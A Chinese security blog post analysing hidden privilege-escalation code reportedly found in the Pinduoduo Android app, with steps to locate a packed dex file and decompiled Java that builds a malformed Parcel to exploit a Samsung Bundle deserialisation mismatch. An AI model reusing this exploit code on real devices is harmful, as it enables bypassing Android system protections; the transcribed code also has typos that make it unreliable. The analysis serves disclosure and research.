拼多多apk内嵌提权代码，及动态下发dex分析

作者：Sec-Labs | 发布时间：2023-03-08 22:40:01

项目地址

https://github.com/davinci1010/pinduoduo_backdoor

拼多多apk内嵌提权代码，及动态下发dex分析

参考「深蓝洞察」的文章：https://mp.weixin.qq.com/s/P_EYQxOEupqdU0BJMRqWsw （Bundle 风水 - Android Parcel 序列化与反序列化不匹配系列漏洞，实现 0day/Nday 攻击，从而绕过系统校验，获取系统级 StartAnyWhere 能力）

复现流程如下：
下载3月5日前更新的（6.50版本前）的拼多多apk，如6.49版本：
https://com-xunmeng-pinduoduo.en.uptodown.com/android/download/91472728

解压apk文件，找到拼多多apk中，提权代码所在的文件位置：
pinduoduo-6-49-0.zip\assets\component\com.xunmeng.pinduoduo.AliveBaseAbility.7z\com.xunmeng.pinduoduo.AliveBaseAbility\vmp_src\mw1.bin

以上是一个加VMP壳的dex文件，脱壳还原出代码，可以找到针对不同手机厂商系统的多个用于提权的漏洞利用代码，胆子相当的大，比如利用三星手机“com.samsung.android.cepproxyks.CertByte”的提权漏洞，代码如下：

// assets/component/com.xunmeng.pinduoduo.AliveBaseAbilitiy
// [Manwei]
// com/xunmeng/pinduoduo/android_pull_ablity_comp/pullstartup/SamsungAlivePullStartup 

Public static Bundle makeBundleForSamsungSinceP(Intent intent){
   Bundle bundle = new Bundle();
   Parcel obtain = Parcel.obtain();
   Parcel obtain2 = Parcel.obtain();
   Parcel obtain3 = Parcel.obtain();
   obtain2.writeInt(3);
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(3);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(4);
   obtain2.writeString("com.samsung.android.cepproxyks.CertByte");
   obtain2.writeInt(0);
   byte b[] = new byte[0];
   obtain2.writeByteArray(b);
   obtain2.writeInt(0);
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(53);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(1);
   obtain2.writeInt(1);
   obtain2.writeInt(13);
   obtain2.writeInt(72);
   obtain2.writeInt(48);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(0);
   obtain2.writeInt(13);
   obtain2.writeInt(-1);
   int dataPosition = obtain2.dataPosition();
   obtain2.writeString("intent");
   obtain2.writeInt(4);
   obtain2.writeString("android.content.Intent");
   obtain2.writeToParcel(obtain3, 0);
   obtain2.appendFrom(obtain3, 0, obtain3.dataSize());
   int dataPosition2 = obtain2.dataPosition();
   obtain2.setDataPosition(dataPosition2 - 4);
   obtain2.writeInit(dataPosition2 -dataPosition);
   obtain2.setdataPosition(dataPosition2);
   int dataSize = obtain2.dataSize();
   obtain.writeInt(dataSize);
   obtain.writeInt(1279544898);
   obtain.appendFrom(obtain2, 0, dataSize);
   obtain.setDataPosition(0);
   bundle.readFromParcel(obtain);
   return bundle;
}

标签：实战分享, 漏洞分享, APP分析, andriod学习